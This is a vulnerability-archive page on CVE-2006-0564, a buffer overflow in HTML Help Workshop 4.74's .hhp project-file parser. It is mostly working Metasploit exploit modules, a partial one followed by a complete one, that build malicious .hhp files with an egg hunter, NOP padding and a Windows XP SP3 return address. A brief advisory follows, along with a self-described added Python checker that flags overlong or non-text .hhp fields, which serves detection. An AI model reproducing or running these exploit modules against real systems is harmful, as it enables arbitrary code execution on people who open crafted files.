		eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

		off = target['Offset']
		idxf = ""
		idxf << make_nops(off - eh_stub.length)
		idxf << eh_stub
		idxf << [target.ret].pack('V')

		sploit = "[OPTIONS]\r\n"
		sploit << "Compiled file="
		sploit << idxf
		sploit << "\r\n"
		sploit << "\r\n"
		sploit << "[FILES]\r\n"
		sploit << "\r\n"
		sploit << eh_egg

		hhp = sploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(hhp)
	end

end

- Vulnerability information (F84552)

HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit (PacketStormID:F84552)
2009-12-31 00:00:00
bratax,jduck  metasploit.com
exploit,overflow,arbitrary
CVE-2006-0564

This Metasploit module exploits a stack overflow in HTML Help Workshop 4.74. By creating a specially crafted hhp file, an attacker may be able to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking
	
	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Egghunter
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit',
			'Description'    => %q{
					This module exploits a stack overflow in HTML Help Workshop 4.74.
					By creating a specially crafted hhp file, an attacker may be able
					to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'bratax', 'jduck' ],
			'Version'        => '$Revision: 7759 $',
			'References'     =>
				[
					[ 'CVE', '2006-0564' ],
					[ 'OSVDB', '22941' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1470' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/1495' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},					
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x1a\x2f\x5c",
					'StackAdjustment' => -4800,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 0x00401F93 } ], # CALL EDI hhw.exe v4.74.8702.0
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Feb 06 2006',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME',   [ false, 'The file name.', 'msf.hhp']),
				], self.class)

	end

	def exploit
		
		# use the egghunter!
		eh_stub, eh_egg = generate_egghunter
		
		off = target['Offset']
		idxf = ""
		idxf << make_nops(off - eh_stub.length)
		idxf << eh_stub
		idxf << [target.ret].pack('V')
		
		sploit = "[OPTIONS]\r\n"
		sploit << "Contents file="
		sploit << idxf
		sploit << "\r\n"
		sploit << "\r\n"
		sploit << "[FILES]\r\n"
		sploit << "\r\n"
		sploit << eh_egg * 2
		sploit << payload.encoded
		
		hhp = sploit

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(hhp)
	end

end

- Vulnerability information

22941
Microsoft HTML Help Workshop .hhp Parsing Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

A local overflow exists in HTML Help Workshop. HTML Help Workshop fails to check an unspecified buffer when reading .hhp files resulting in a buffer overflow. With a specially crafted file, an attacker can cause code execution by the individual opening the .hhp file resulting in a loss of integrity.
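As a defensive check, the following is an added example (not code from the page, the advisory, or HTML Help Workshop) that parses the [OPTIONS] section of a .hhp project file and flags what the exploits above rely on: an implausibly long or non-text value in a field such as Contents file, Compiled file or Index file, and non-text bytes in any other section, where the egg-hunter variants place their payload. The function names, the 200-byte limit and the two sample files are assumptions constructed for the example.

```python
"""Static checker for .hhp project files (CVE-2006-0564).

Added example, not code from the page, the advisory or HTML Help Workshop.
Assumption: a legitimate [OPTIONS] value is a short printable path or
keyword, so values longer than MAX_FIELD_LEN or containing non-printable
bytes are flagged, as are non-text bytes in any other section.
"""
from __future__ import annotations

MAX_FIELD_LEN = 200  # assumption; the public exploits use 242-300 byte values


def split_lines(data: bytes) -> list[bytes]:
    """Split on CRLF (the native .hhp line ending) and on bare LF."""
    return data.replace(b"\r\n", b"\n").split(b"\n")


def is_printable_ascii(value: bytes) -> bool:
    """True if every byte could appear in a path or keyword."""
    return all(0x20 <= b <= 0x7E for b in value)


def parse_sections(data: bytes) -> dict[bytes, list[bytes]]:
    """Group non-empty lines under their [SECTION] header (lower-cased)."""
    sections: dict[bytes, list[bytes]] = {}
    current = b""
    for line in split_lines(data):
        if line.startswith(b"[") and line.endswith(b"]"):
            current = line[1:-1].lower()
            sections.setdefault(current, [])
        elif line:
            sections.setdefault(current, []).append(line)
    return sections


def scan_hhp(data: bytes) -> list[str]:
    """Return one finding per suspicious condition; an empty list means clean."""
    findings: list[str] = []
    sections = parse_sections(data)
    for line in sections.get(b"options", []):
        key, sep, value = line.partition(b"=")
        if not sep:
            continue
        name = key.strip().lower().decode("ascii", "replace")
        if len(value) > MAX_FIELD_LEN:
            findings.append(
                f"[OPTIONS] {name}: value is {len(value)} bytes (limit {MAX_FIELD_LEN})"
            )
        if not is_printable_ascii(value):
            findings.append(f"[OPTIONS] {name}: value contains non-printable bytes")
    for sect, lines in sections.items():
        if sect == b"options":
            continue
        label = sect.decode("ascii", "replace").upper() or "<no section>"
        if any(not is_printable_ascii(line) for line in lines):
            findings.append(f"[{label}] contains non-printable bytes")
    return findings


# Constructed samples: a normal project file and one shaped like the exploits
# on this page (overlong "Contents file" value padded with 0x41 and 0x90 bytes,
# plus a non-text blob after [FILES]).
BENIGN_HHP = (
    b"[OPTIONS]\r\nCompatibility=1.1 or later\r\nCompiled file=help.chm\r\n"
    b"Contents file=toc.hhc\r\nIndex file=index.hhk\r\n\r\n[FILES]\r\nindex.htm\r\n"
)
SUSPECT_HHP = (
    b"[OPTIONS]\r\nContents file=" + b"A" * 280 + b"\x90" * 16 + b"\r\n\r\n"
    b"[FILES]\r\n" + b"\x90" * 32 + b"\r\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_HHP), ("suspect", SUSPECT_HHP)):
        hits = scan_hhp(sample)
        print(f"{label}: {'clean' if not hits else ''}")
        for hit in hits:
            print("  " + hit)
```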

- Timeline

2006-02-06 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- References

- Vulnerability author
